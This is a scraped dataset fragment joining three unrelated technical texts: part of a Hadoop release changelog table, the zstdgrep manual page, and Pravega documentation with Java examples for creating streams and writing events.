| TestLdapGroupsMapping failing -string mismatch in exception validation | Major | test | Steve Loughran | Steve Loughran | | | Update PATCH\\NAMING\\RULE in the personality file | Minor | build | Akira Ajisaka | Akira Ajisaka | | | Fix outdated properties of JournalNode when performing rollback | Minor | . | Deegue | Deegue | | | Improve excessive reloading of Configurations | Major | conf | Ahmed Hussein | Ahmed Hussein | | | Fix the documentation for dfs.namenode.replication.max-streams in hdfs-default.xml | Major | . | Xieming Li | Xieming Li | | | Doing hadoop ls on Har file triggers too many RPC calls | Major | fs | Ahmed Hussein | Ahmed Hussein | | | TimelineConnector swallows InterruptedException | Major | . | Ahmed Hussein | Ahmed Hussein | | | Log the remote address for authentication success | Minor | ipc | Ahmed Hussein | Ahmed Hussein | | | Fair call queue is defeated by abusive service principals | Major | common, ipc | Ahmed Hussein | Ahmed Hussein | | | When building new web ui with root user, the bower install should support it. 
| Major | build, yarn-ui-v2 | Qi Zhu | Qi Zhu | | | Fix Yarn CapacityScheduler Markdown document | Trivial | documentation | zhaoshengjie | zhaoshengjie | | | NN should not let the balancer run in safemode | Major | namenode | Ahmed Hussein | Ahmed Hussein | | | Update yarn.nodemanager.env-whitelist value in docs | Minor | documentation | Andrea Scarpino | Andrea Scarpino | | | NNTop counts don't add up as expected | Major | hdfs, metrics, namenode | Ahmed Hussein | Ahmed Hussein | | | EC: Socket file descriptor leak in StripedBlockChecksumReconstructor | Major | datanode, ec, erasure-coding | Yushi Hayasaka | Yushi Hayasaka | | | Fix deprecation warnings in SLSWebApp.java | Minor | build | Akira Ajisaka | Ankit Kumar | | | ServerSocketUtil.getPort() should use loopback address, not 0.0.0.0 | Major | . | Eric Badger | Eric Badger | | | Lease Recovery never completes for a committed block which the DNs never finalize | Major | namenode | Stephen O'Donnell | Stephen O'Donnell | | | EC: Block gets marked as CORRUPT in case of failover and pipeline recovery | Critical | erasure-coding | Ayush Saxena | Ayush Saxena | | | [Hadoop 3] Both NameNodes can crash simultaneously due to the short JN socket timeout | Critical | . | Wei-Chiu Chuang | Wei-Chiu Chuang | | | Upgrade node.js to 10.23.1 and yarn to 1.22.5 in Web UI v2 | Major | webapp, yarn-ui-v2 | Akira Ajisaka | Akira Ajisaka | | | maxAMShare should only be accepted for leaf queues, not parent queues | Major | . | Siddharth Ahuja | Siddharth Ahuja | | | Increase docker memory limit in Jenkins | Major | build, scripts, test, yetus | Ahmed Hussein | Ahmed Hussein | | | Clear the fileMap in JHEventHandlerForSigtermTest | Minor | test | Zhengxi Li | Zhengxi Li | | | Stale record should be remove when MutableRollingAverages generating aggregate data. | Major | . | Haibin Huang | Haibin Huang | | | AbstractContractDeleteTest should set recursive parameter to true for recursive test cases. | Major |" }, { "data": "| Konstantin Shvachko | Anton Kutuzov | | | Intermittent test failure org.apache.hadoop.hdfs.server.namenode.snapshot.TestSnapshotFileLength.testSnapshotfileLength | Major | hdfs, snapshots | Hanisha Koneru | Jim Brennan | | | Fix typo in BUILDING.txt | Trivial | documentation | Gautham Banasandra | Gautham Banasandra | | | EC: Wrong checksum when reconstruction was failed by exception | Major | datanode, ec, erasure-coding | Yushi Hayasaka | Yushi Hayasaka | | | EC: fix NPE caused by StripedWriter.clearBuffers during reconstruct block | Major | . | Hongbing Wang | Hongbing Wang | | | EC: Reconstruct task failed, and It would be XmitsInProgress of DN has negative number | Major | . | Haiyang Hu | Haiyang Hu | | | Zombie applications in the YARN queue using FAIR + sizebasedweight | Critical | capacityscheduler | Guang Yang | Andras Gyori | | | User environment is unable to prepend PATH when mapreduce.admin.user.env also sets PATH | Major | . | Eric Badger | Eric Badger | | | Upgrade ant to 1.10.9 | Major | . | Akira Ajisaka | Akira Ajisaka | | | TestDelegationTokenRenewer fails intermittently | Major | test | Akira Ajisaka | Masatake Iwasaki | | | Upgrade Jackson databind to 2.10.5.1 | Major | build | Adam Roberts | Akira Ajisaka | | | Remove job\\history\\summary.py | Major | . | Akira Ajisaka | Akira Ajisaka | | | Fix TestRMNodeLabelsManager failed after YARN-10501. | Major | . | Qi Zhu | Qi Zhu | | | Hadoop prints sensitive Cookie information. | Major | . 
| Renukaprasad C | Renukaprasad C | | | Reported IBR is partially replaced with stored info when queuing. | Critical | namenode | Kihwal Lee | Stephen O'Donnell | | | CapacityScheduler crashed with NPE in AbstractYarnScheduler.updateNodeResource() | Major | . | Haibo Chen | Haibo Chen | | | ClusterMapReduceTestCase does not clean directories | Major | . | Ahmed Hussein | Ahmed Hussein | | | Skip any credentials stored in HDFS when starting ZKFC | Major | hdfs | Krzysztof Adamski | Stephen O'Donnell | | | ExpiredHeartbeats metric should be of Type.COUNTER | Major | metrics | Konstantin Shvachko | Qi Zhu | | | All testcases in TestReservations are flaky | Major | . | Szilard Nemeth | Szilard Nemeth | | | skip-dir option is not processed by Yetus | Major | build, precommit, yetus | Ahmed Hussein | Ahmed Hussein | | | Check whether file is being truncated before truncate | Major | . | Hui Fei | Hui Fei | | | Replace GitHub App Token with GitHub OAuth token | Major | build | Akira Ajisaka | Akira Ajisaka | | | Add option to disable/enable free disk space checking and percentage checking for full and not-full disks | Major | nodemanager | Qi Zhu | Qi Zhu | | | Upgrade org.codehaus.woodstox:stax2-api to 4.2.1 | Major | . | Ayush Saxena | Ayush Saxena | | | Correct timestamp format in the docs for the touch command | Major | . | Stephen O'Donnell | Stephen O'Donnell | | | Percentage of queue and cluster is zero in WebUI | Major |" }, { "data": "| Bilwa S T | Bilwa S T | | | revisiting TestMRIntermediateDataEncryption | Major | job submission, security, test | Ahmed Hussein | Ahmed Hussein | | | Fix the wrong CIDR range example in Proxy User documentation | Minor | documentation | Kwangsun Noh | Kwangsun Noh | | | Upgrade com.github.eirslett:frontend-maven-plugin to 1.11.2 | Major | buid | Mingliang Liu | Mingliang Liu | | | Intermediate data encryption is broken in LocalJobRunner | Major | job submission, security | Ahmed Hussein | Ahmed Hussein | | | Resources are displayed in bytes in UI for schedulers other than capacity | Major | . | Bilwa S T | Bilwa S T | | | Upgrade JUnit to 4.13.1 | Major | build, security, test | Ahmed Hussein | Ahmed Hussein | | | RBF: empty blockpool id on dfsrouter caused by UNAVAILABLE NameNode | Major | rbf | Harunobu Daikoku | Harunobu Daikoku | | | Can't remove all node labels after add node label without nodemanager port | Critical | yarn | caozhiqiang | caozhiqiang | | | Fix typo in ContainerRuntime | Trivial | documentation | Wanqiang Ji | xishuhai | | | Remove unused hdfs.proto import | Major | hdfs-client | Gautham Banasandra | Gautham Banasandra | | | Fix integer overflow | Major | libhdfs++ | Gautham Banasandra | Gautham Banasandra | | | Fix test4tests for libhdfspp | Critical | build, libhdfs++ | Gautham Banasandra | Gautham Banasandra | | | Fix TestKMS failure | Major | kms | Akira Ajisaka | Akira Ajisaka | | | Upgrading to JUnit 4.13 causes tests in TestNodeStatusUpdater to fail | Major | nodemanager, test | Peter Bacsko | Peter Bacsko | | | ITestWasbUriAndConfiguration.testCanonicalServiceName() failing now mockaccount exists | Minor | fs/azure, test | Steve Loughran | Steve Loughran | | | Upgrade Jetty to 9.4.40 | Blocker | . | Akira Ajisaka | Akira Ajisaka | | | Can't remove all node labels after add node label without nodemanager port, broken by YARN-10647 | Major | . 
| D M Murali Krishna Reddy | D M Murali Krishna Reddy | | | Datanode DirectoryScanner uses excessive memory | Major | datanode | Stephen O'Donnell | Stephen O'Donnell | | | Remove additional junit 4.11 dependency from javadoc | Major | build, test, timelineservice | ANANDA G B | Akira Ajisaka | | | Missing access check before getAppAttempts | Critical | webapp | lujie | lujie | | | checkcompatibility.py errors out when specifying annotations | Major | . | Wei-Chiu Chuang | Wei-Chiu Chuang | | | Build of Mapreduce Native Task module fails with unknown opcode \"bswap\" | Major | . | Anup Halarnkar | Anup Halarnkar | | | Explicitly set locale in the Dockerfile | Blocker | build | Wei-Chiu Chuang | Wei-Chiu Chuang | | | ExitUtil#halt info log should log HaltException | Major | . | Viraj Jasani | Viraj Jasani | | | container-executor permission is wrong in SecureContainer.md | Major | documentation | Akira Ajisaka | Siddharth Ahuja | | | Race condition with async edits logging due to updating txId outside of the namesystem log | Major | hdfs, namenode | Konstantin Shvachko | Konstantin Shvachko | | | RpcQueueTime metric counts requeued calls as unique events. | Major | hdfs | Simbarashe Dzinamarira | Simbarashe Dzinamarira | | | testWithHbaseConfAtHdfsFileSystem consistently failing | Major | . | Viraj Jasani | Viraj Jasani | | | Quota is not preserved in snapshot INode | Major | hdfs | Siyao Meng | Siyao Meng | | | WebHdfsFileSystem has a possible connection leak in connection with HttpFS | Major |" }, { "data": "| Takanobu Asanuma | Takanobu Asanuma | | | Yarn Logs Command retrying on Standby RM for 30 times | Major | . | D M Murali Krishna Reddy | D M Murali Krishna Reddy | | | Improve datanode shutdown latency | Major | datanode | Ahmed Hussein | Ahmed Hussein | | | Delete hadoop.ssl.enabled and dfs.https.enable from docs and core-default.xml | Major | documentation | Takanobu Asanuma | Takanobu Asanuma | | | Namenode deletes large dir slowly caused by FoldedTreeSet#removeAndGet | Major | . | Yiqun Lin | Haibin Huang | | | DFTestUtil.waitReplication can produce false positives | Major | hdfs | Ahmed Hussein | Ahmed Hussein | | | LeaseRenewer#daemon threads leak in DFSClient | Major | . | Tao Yang | Renukaprasad C | | | [UI2] Upgrade Node.js to at least v12.22.1 | Major | yarn-ui-v2 | Akira Ajisaka | Masatake Iwasaki | | | Backport YARN-9789 to branch-3.2 | Major | . | Tarun Parimi | Tarun Parimi | | | Upgrade JUnit to 4.13.2 | Major | . | Ahmed Hussein | Ahmed Hussein | | | Title not set for JHS and NM webpages | Major | . | Rajshree Mishra | Bilwa S T | | | Avoid creating LayoutFlags redundant objects | Major | . | Viraj Jasani | Viraj Jasani | | | Incorrect log placeholders used in JournalNodeSyncer | Minor | . | Viraj Jasani | Viraj Jasani | | | Mapreduce job fails when NM is stopped | Major | . | Bilwa S T | Bilwa S T | | | Iterative snapshot diff report can generate duplicate records for creates, deletes and Renames | Major | snapshots | Srinivasu Majeti | Shashikant Banerjee | | | ConcurrentModificationException error happens on NameNode occasionally | Critical | hdfs | Daniel Ma | Daniel Ma | | | Better token validation | Major | . | Artem Smotrakov | Artem Smotrakov | | | DatanodeAdminMonitor scan should be delay based | Major | datanode | Ahmed Hussein | Ahmed Hussein | | | Improper pipeline close recovery causes a permanent write failure or data loss. | Major | . 
| Kihwal Lee | Kihwal Lee | | | ViewFS should initialize target filesystems lazily | Major | client-mounts, fs, viewfs | Uma Maheswara Rao G | Abhishek Das | | | HDFS default value change (with adding time unit) breaks old version MR tarball work with Hadoop 3.x | Critical | configuration, hdfs | Junping Du | Akira Ajisaka | | | Set default capacity of root for node labels | Major | . | Andras Gyori | Andras Gyori | | | TestTimelineClientV2Impl.testSyncCall fails intermittently | Minor | ATSv2, test | Prabhu Joseph | Andras Gyori | | | Multiple CloseOp shared block instance causes the standby namenode to crash when rolling editlog | Critical | . | Yicong Cai | Wan Chang | | | RM HA startup can fail due to race conditions in ZKConfigurationStore | Major | . | Tarun Parimi | Tarun Parimi | | | Entities missing from ATS when summary log file info got returned to the ATS before the domain log | Critical | yarn | Sushmitha Sreenivasan | Xiaomin Zhang | | | HistoryServerRest.html#Task\\Counters\\API, modify the jobTaskCounters's itemName from \"taskcounterGroup\" to" }, { "data": "| Minor | documentation | jenny | jenny | | | Fix fair scheduler race condition in app submit and queue cleanup | Blocker | fairscheduler | Wilfred Spiegelenburg | Wilfred Spiegelenburg | | | Fair scheduler can delete a dynamic queue while an application attempt is being added to the queue | Major | fairscheduler | Haibo Chen | Wilfred Spiegelenburg | | | Upgrade commons-compress to 1.21 | Major | common | Dongjoon Hyun | Akira Ajisaka | | | Upgrade JSON smart to 2.4.7 | Major | . | Renukaprasad C | Renukaprasad C | | | Upgrade ZooKeeper to 3.4.14 in branch-3.2 | Major | . | Akira Ajisaka | Masatake Iwasaki | | | Bug fix for Util#receiveFile | Minor | . | tomscut | tomscut | | | YARN shouldn't start with empty hadoop.http.authentication.signature.secret.file | Major | . | Benjamin Teke | Tamas Domok | | | Avoid possible class loading deadlock with VerifierNone initialization | Major | . | Viraj Jasani | Viraj Jasani | | | Upgrade ant to 1.10.11 | Major | . | Ahmed Hussein | Ahmed Hussein | | | Permission checking error on an existing directory in LogAggregationFileController#verifyAndCreateRemoteLogDir | Major | nodemanager | Tamas Domok | Tamas Domok | | | SnapshotDiff behaviour with Xattrs and Acls is not consistent across NN restarts with checkpointing | Major | snapshots | Srinivasu Majeti | Shashikant Banerjee | | | Short circuit read leaks Slot objects when InvalidToken exception is thrown | Major | . | Eungsop Yoo | Eungsop Yoo | | | Backport HADOOP-15993 to branch-3.2 which address CVE-2014-4611 | Major | . | Brahma Reddy Battula | Brahma Reddy Battula | | | Do not use exception handler to implement copy-on-write for EnumCounters | Major | namenode | Wei-Chiu Chuang | Wei-Chiu Chuang | | | Deadlock in LeaseRenewer for static remove method | Major | hdfs | angerszhu | angerszhu | | | Upgrade Kafka to 2.8.1 | Major | . 
| Takanobu Asanuma | Takanobu Asanuma | | | Int overflow in computing safe length during EC block recovery | Critical | 3.1.1 | daimin | daimin | | | Exclude IBM Java security classes from being shaded/relocated | Major | build | Nicholas Marion | Nicholas Marion | | | Backport HADOOP-17683 for branch-3.2 | Major | security | Ananya Singh | Ananya Singh | | | Disable JIRA plugin for YETUS on Hadoop | Critical | build | Gautham Banasandra | Gautham Banasandra | | | numOfReplicas is given the wrong value in BlockPlacementPolicyDefault$chooseTarget can cause DataStreamer to fail with Heterogeneous Storage | Major | namanode | Max Xie | Max Xie | | | Datanode start time should be set after RPC server starts successfully | Minor | . | Viraj Jasani | Viraj Jasani | | | Synchronizing iteration of Configuration properties object | Major | conf | Jason Darrell Lowe | Dhananjay Badaya | | | Backport HDFS-14729 for branch-3.2 | Major | security | Ananya Singh | Ananya Singh | | | Unknown frame descriptor when decompressing multiple frames in ZStandardDecompressor | Major | . | xuzq | xuzq | | | Insecure Xml parsing in OfflineEditsXmlLoader | Minor |" }, { "data": "| Ashutosh Gupta | Ashutosh Gupta | | | Avoid deleting unique data blocks when deleting redundancy striped blocks | Critical | ec, erasure-coding | qinyuren | Jackson Wang | | | Source path with storagePolicy cause wrong typeConsumed while rename | Major | hdfs, namenode | lei w | lei w | | | ReverseXML processor doesn't accept XML files without the SnapshotDiffSection. | Critical | hdfs | yanbin.zhang | yanbin.zhang | | | Fix thread safety of EC decoding during concurrent preads | Critical | dfsclient, ec, erasure-coding | daimin | daimin | | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | Timeline related testcases are failing | Major | . | Prabhu Joseph | Abhishek Modi | | | TestRedudantBlocks#testProcessOverReplicatedAndRedudantBlock sometimes fails | Minor | test | Hui Fei | Hui Fei | | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | [JDK9] Add missing javax.activation-api dependency | Critical | test | Akira Ajisaka | Akira Ajisaka | | | FSSchedulerConfigurationStore fails to update with hdfs path | Major | capacityscheduler | Prabhu Joseph | Prabhu Joseph | | | Rewrite Python example codes using Python3 | Minor | documentation | Kengo Seki | Kengo Seki | | | Update jackson-databind to 2.10.3 to relieve us from the endless CVE patches | Major | . | Wei-Chiu Chuang | Wei-Chiu Chuang | | | TestRMHATimelineCollectors fails on hadoop trunk | Major | test, yarn | Ahmed Hussein | Bilwa S T | | | ViewFsOverloadScheme should work when -fs option pointing to remote cluster without mount links | Major | viewfsOverloadScheme | Uma Maheswara Rao G | Uma Maheswara Rao G | | | When Empty mount points, we are assigning fallback link to self. But it should not use full URI for target fs. | Major | . | Uma Maheswara Rao G | Uma Maheswara Rao G | | | TestBlockTokenWithDFSStriped fails intermittently | Major | hdfs | Ahmed Hussein | Ahmed Hussein | | | TestDFSClientRetries#testGetFileChecksum fails intermittently | Major | dfsclient, test | Ahmed Hussein | Ahmed Hussein | | | TestHAAppend#testMultipleAppendsDuringCatchupTailing is flaky | Major | . 
| Vinayakumar B | Ahmed Hussein | | | TestFsDatasetImpl fails intermittently | Major | hdfs | Ahmed Hussein | Ahmed Hussein | | | Backport HADOOP-16005-\"NativeAzureFileSystem does not support setXAttr\" to branch-3.2 | Major | fs/azure | Sally Zuo | Sally Zuo | | | EC: Fix checksum computation in case of native encoders | Blocker | . | Ahmed Hussein | Ayush Saxena | | | WASB: Test failures | Major | fs/azure, test | Sneha Vijayarajan | Steve Loughran | | | TestUpgradeDomainBlockPlacementPolicy flaky | Major | namenode, test | Ahmed Hussein | Ahmed Hussein | | | TestMultipleNNPortQOP#testMultipleNNPortOverwriteDownStream fails intermittently | Minor | . | Toshihiko Uchida | Toshihiko Uchida | | | TestBalancerWithMultipleNameNodes#testBalancingBlockpoolsWithBlockPoolPolicy fails on trunk | Major | . | Ahmed Hussein | Masatake Iwasaki | | | Fix TestFsDatasetImpl.testReadLockCanBeDisabledByConfig | Minor | test | Leon Gao | Leon Gao | | | Migrate to Python 3 and upgrade Yetus to 0.13.0 | Major | . | Akira Ajisaka | Akira Ajisaka | | | Improve the Logs for File Concat Operation | Minor | namenode | Bhavik Patel | Bhavik Patel | | | TestBalancer#testMaxIterationTime fails sporadically | Major | . | Jason Darrell Lowe | Toshihiko Uchida | | | ClusterMetrics should support GPU capacity related" }, { "data": "| Major | metrics, resourcemanager | Qi Zhu | Qi Zhu | | | Improve the log for HTTPFS server operation | Minor | httpfs | Bhavik Patel | Bhavik Patel | | | Some tests in TestBlockRecovery are consistently failing | Major | . | Viraj Jasani | Viraj Jasani | | | Add cluster metric for amount of CPU used by RM Event Processor | Minor | yarn | Jim Brennan | Jim Brennan | | | [JDK 15] TestPrintableString fails due to Unicode 13.0 support | Major | . | Akira Ajisaka | Akira Ajisaka | | | Change CS nodes page in UI to support custom resource. | Major | . | Qi Zhu | Qi Zhu | | | whitespace not allowed in paths when saving files to s3a via committer | Blocker | fs/s3 | Krzysztof Adamski | Krzysztof Adamski | | | mvn versions:set fails to parse pom.xml | Blocker | build | Wei-Chiu Chuang | Wei-Chiu Chuang | | | Race condition: AsyncDispatcher can get stuck by the changes introduced in YARN-8995 | Critical | resourcemanager | zhengchenyu | zhengchenyu | | | Set dfs.namenode.redundancy.considerLoad to false in MiniDFSCluster | Major | test | Akira Ajisaka | Ahmed Hussein | | | Backport HADOOP-17837 to branch-3.2 | Minor | . | Bryan Beaudreault | Bryan Beaudreault | | | implement non-guava Precondition checkNotNull | Major | . | Ahmed Hussein | Ahmed Hussein | | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | Remove unused configuration dfs.namenode.stripe.min | Minor | . | tomscut | tomscut | | | Add metrics for FSNamesystem read/write lock hold long time | Major | hdfs | tomscut | tomscut | | | Add namenode address in logs for block report | Minor | datanode, hdfs | tomscut | tomscut | | | Close FSImage and FSNamesystem after formatting is complete | Minor | . | tomscut | tomscut | | | Add metric for editPendingQ in FSEditLogAsync | Minor | . | tomscut | tomscut | | | Remove unused parameters for DatanodeManager.handleLifeline() | Minor | . | tomscut | tomscut | | | CapacityScheduler test framework ProportionalCapacityPreemptionPolicyMockFramework need some review | Major | . 
| Gergely Pollk | Szilard Nemeth | | | Reduce threadCount for unit tests to reduce the memory usage | Major | build, test | Akira Ajisaka | Akira Ajisaka | | | Upgrade com.fasterxml.woodstox:woodstox-core for security reasons | Major | . | Viraj Jasani | Viraj Jasani | | | DFSAdmin#printOpenFiles has redundant String#format usage | Minor | . | Viraj Jasani | Viraj Jasani | | | Bump netty to the latest 4.1.61 | Blocker | . | Wei-Chiu Chuang | Wei-Chiu Chuang | | | Backport to branch-3.2 HADOOP-17371, HADOOP-17621, HADOOP-17625 to update Jetty to 9.4.39 | Major | . | Wei-Chiu Chuang | Wei-Chiu Chuang | | | Split TestBalancer into two classes | Major | . | Viraj Jasani | Viraj Jasani | | | ipc.Client not setting interrupt flag after catching InterruptedException | Minor | . | Viraj Jasani | Viraj Jasani | | | Bump aliyun-sdk-oss to 3.13.0 | Major | . | Siyao Meng | Siyao Meng | | | Bump netty to the latest 4.1.68 | Major | . | Takanobu Asanuma | Takanobu Asanuma | | | Update the year to 2022 | Major | . | Ayush Saxena | Ayush Saxena | | | Utility to identify git commit / Jira fixVersion discrepancies for RC preparation" } ]
{ "category": "App Definition and Development", "file_name": "zstdgrep.1.md", "project_name": "MongoDB", "subcategory": "Database" }
[ { "data": "zstdgrep(1) -- print lines matching a pattern in zstandard-compressed files ============================================================================ SYNOPSIS -- `zstdgrep` [<grep-flags>] [--] <pattern> [<files> ...] DESCRIPTION -- `zstdgrep` runs `grep`(1) on files, or `stdin` if no files argument is given, after decompressing them with `zstdcat`(1). The <grep-flags> and <pattern> arguments are passed on to `grep`(1). If an `-e` flag is found in the <grep-flags>, `zstdgrep` will not look for a <pattern> argument. Note that modern `grep` alternatives such as `ripgrep` (`rg`(1)) support `zstd`-compressed files out of the box, and can prove better alternatives than `zstdgrep` notably for unsupported complex pattern searches. Note though that such alternatives may also feature some minor command line differences. EXIT STATUS -- In case of missing arguments or missing pattern, 1 will be returned, otherwise 0. SEE ALSO -- `zstd`(1) AUTHORS Thomas Klausner <wiz@NetBSD.org>" } ]
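A couple of typical invocations, shown purely for illustration (the file names are made up, and any standard `grep`(1) flags simply pass through):

```
zstdgrep 'checksum mismatch' build.log.zst
zstdgrep -i -n 'timeout' -- server.log.zst
```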
{ "category": "App Definition and Development", "file_name": "basic-reader-and-writer.md", "project_name": "Pravega", "subcategory": "Streaming & Messaging" }
[ { "data": "<!-- Copyright Pravega Authors. Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> Let's examine how to build Pravega applications. The simplest kind of Pravega application uses a Reader to read from a Stream or a Writer that writes to a Stream.A simple sample application of both can be found in the (`HelloWorldReader` and `HelloWorldWriter`) applications. These samples give a sense on how a Java application could use the Pravega's Java Client Library to access Pravega functionality. Instructions for running the sample applications can be found in the [Pravega Samples](https://github.com/pravega/pravega-samples/blob/v0.5.0/pravega-client-examples/README.md). Get familiar with the before executing the sample applications. The `HelloWorldWriter` application demonstrates the usage of `EventStreamWriter` to write an Event to Pravega. The key part of `HelloWorldWriter` is in the `run()` method. The purpose of the `run()` method is to create a Stream and output the given Event to that Stream. ```Java public void run(String routingKey, String message) { StreamManager streamManager = StreamManager.create(controllerURI); final boolean scopeCreation = streamManager.createScope(scope); StreamConfiguration streamConfig = StreamConfiguration.builder() .scalingPolicy(ScalingPolicy.fixed(1)) .build(); final boolean streamCreation = streamManager.createStream(scope, streamName, streamConfig); try (ClientFactory clientFactory = ClientFactory.withScope(scope, controllerURI); EventStreamWriter<String> writer = clientFactory.createEventWriter(streamName, new JavaSerializer<String>(), EventWriterConfig.builder().build())) { System.out.format(\"Writing message: '%s' with routing-key: '%s' to stream '%s / %s'%n\", message, routingKey, scope, streamName); final CompletableFuture<Void> writeFuture = writer.writeEvent(routingKey, message); } } ``` are created and manipulated via the `StreamManager` interface to the Pravega Controller. An URI to any of the Pravega Controller instance(s) in your cluster is required to create a `StreamManager` object. In the setup for the `HelloWorld` sample applications, the `controllerURI` is configured as a command line parameter when the sample application is launched. Note: For the \"standalone\" deployment of Pravega, the Controller is listening on localhost, port 9090. The `StreamManager` provides access to various control plane functions in Pravega related to Scopes and Streams: | Method | Parameters | Discussion | |--|-|-| | (static) `create` | (`URI controller`) | Given a URI to one of the Pravega Controller instances in the Pravega Cluster, create a Stream Manager object. | | `createScope` | (String `scopeName`) | Creates a Scope with the given name. | | | | Returns True if the Scope is created, returns False if the Scope already exists. | | | | This method can be called even if the Stream is already existing. | | `deleteScope` | (String `scopeName`) | Deletes a Scope with the given name. | | | | Returns True if the scope was deleted, returns False otherwise. 
| | | | If the Scope contains Streams, the `deleteScope` operation will fail with an exception. | | | | If we delete a non-existent Scope, the method will succeed and return False. | | `createStream` | (String `scopeName`, String `streamName`, `StreamConfiguration config`) | Create a Stream within a given Scope. | | | | Both Scope name and Stream name are limited using the following characters: Letters (a-z A-Z), numbers (0-9) and delimiters: \".\" and \"-\" are" }, { "data": "| | | | The Scope must exist, an exception is thrown if we create a Stream in a non-existent Scope. | | | | A Stream Configuration is built using a builder pattern. | | | | Returns True if the Stream is created, returns False if the Stream already exists. | | | | This method can be called even if the Stream is already existing. | | `updateStream` | (String `scopeName`, String `streamName`, `StreamConfiguration config`) | Swap out the Stream's configuration. | | | | The Stream must already exist, an exception is thrown if we update a non-existent Stream. | | | | Returns True if the Stream was changed. | | `sealStream` | (String `scopeName`, String `streamName`) | Prevent any further writes to a Stream. | | | | The Stream must already exist, an exception is thrown if you seal a non-existent Stream. | | | | Returns True if the Stream is successfully sealed. | | `deleteStream` | (String `scopeName`, String `streamName`) | Remove the Stream from Pravega and recover any resources used by that Stream. | | | | Returns False if the Stream is non-existent. | | | | Returns True if the Stream was deleted. | The execution of API `createScope(scope)` establishes that the Scope exists. Then we can create the Stream using the API `createStream(scope, streamName, streamConfig)`. The `StreamManager` requires three parameters to create a Stream: Scope Name. Stream Name. Stream Configuration. The most interesting task is to create the Stream Configuration (`streamConfig`). Like many objects in Pravega, a Stream takes a configuration object that allows a developer to control various behaviors of the Stream. All configuration object instantiated via builder pattern. That allows a developer to control various aspects of a Stream's behavior in terms of policies; and [Scaling Policy](pravega-concepts.md#elastic-streams-auto-scaling) are the most important ones related to Streams. For the sake of simplicity, in our sample application we instantiate a Stream with a single segment (`ScalingPolicy.fixed(1)`) and using the default (infinite) retention policy. Once the Stream Configuration (`streamConfig`) object is built, creating the Stream is straight forward using `createStream()`.After the Stream is created, we are all set to start writing Event(s) to the Stream. Applications use an `EventStreamWriter` object to write Events to a Stream.The `EventStreamWriter` is created using the `ClientFactory` object. The `ClientFactory` is used to create Readers, Writers and other types of Pravega Client objects such as the State Synchronizer (see[Working with Pravega: State Synchronizer](state-synchronizer.md)). A `ClientFactory` is created in the context of a Scope, since all Readers, Writers and other Clients created by the `ClientFactory` are created in the context of that Scope.The `ClientFactory` also needs a URI to one of the Pravega Controllers (`ClientFactory.withScope(scope, controllerURI)`) , just like `StreamManager`. 
As the `ClientFactory` and the objects it creates consume resources from Pravega and implement `AutoCloseable`, it is a good practice to create these objects using a try-with-resources. By doing this, we make sure that, regardless of how the application ends, the Pravega resources will be properly closed in the right order. Once the `ClientFactory` is instantiated, we can use it to create a Writer. There are several things a developer needs to know before creating a Writer: What is the name of the Stream to write to? (The Scope has already been determined when the `ClientFactory` was" }, { "data": "What Type of Event objects will be written to the Stream? What serializer will be used to convert an Event object to bytes? (Recall that Pravega only knows about sequences of bytes, it is unaware about Java objects.) Does the Writer need to be configured with any special behavior? ```Java EventStreamWriter<String> writer = clientFactory.createEventWriter(streamName, new JavaSerializer<String>(), EventWriterConfig.builder().build())) ``` The `EventStreamWriter` writes to the Stream specified in the configuration of the `HelloWorldWriter` sample application (by default the stream is named \"helloStream\" in the \"examples\" Scope). The Writer processes Java String objects as Events and uses the built in Java serializer for Strings. Note: Pravega allows users to write their own serializer. For more information and example, please refer to . The `EventWriterConfig` allows the developer to specify things like the number of attempts to retry a request before giving up and associated exponential back-off settings. Pravega takes care to retry requests in the presence of connection failures or Pravega component outages, which may temporarily prevent a request from succeeding, so application logic doesn't need to be complicated by dealing with intermittent cluster failures.In the sample application, `EventWriterConfig` was considered as the default settings. `EventStreamWriter` provides a `writeEvent()` operation that writes the given non-null Event object to the Stream using a given Routing key to determine which Stream Segment it should written to. Many operations in Pravega, such as `writeEvent()`, are asynchronous and return some sort of `Future` object. If the application needed to make sure the Event was durably written to Pravega and available for Readers, it could wait on the `Future` before proceeding. In the case of Pravega's `HelloWorld` example, it does wait on the `Future`. `EventStreamWriter` can also be used to begin a Transaction. We cover Transactions in more detail in [Working with Pravega: Transactions](transactions.md). The `HelloWorldReader` is a simple demonstration of using the `EventStreamReader`. The application reads Events from the given Stream and prints a string representation of those Events onto the console. 
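Both the Writer above and the Reader described next take a Serializer, and the text only points at an external example for writing your own. Before walking through the Reader's `run()` method, here is a minimal sketch of a custom implementation. It assumes the `io.pravega.client.stream.Serializer` interface from the Pravega client library (two methods over `ByteBuffer`); the class name is illustrative and is not part of the samples. ```Java import io.pravega.client.stream.Serializer; import java.nio.ByteBuffer; import java.nio.charset.StandardCharsets; // Illustrative UTF-8 String serializer. Any POJO type can be handled the same // way, as long as serialize() and deserialize() round-trip the same bytes. public class Utf8StringSerializer implements Serializer<String> { @Override public ByteBuffer serialize(String value) { return ByteBuffer.wrap(value.getBytes(StandardCharsets.UTF_8)); } @Override public String deserialize(ByteBuffer serializedValue) { byte[] bytes = new byte[serializedValue.remaining()]; serializedValue.get(bytes); return new String(bytes, StandardCharsets.UTF_8); } } ``` An instance of such a class can be passed to `createEventWriter()` or `createReader()` in place of `new JavaSerializer<String>()`.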
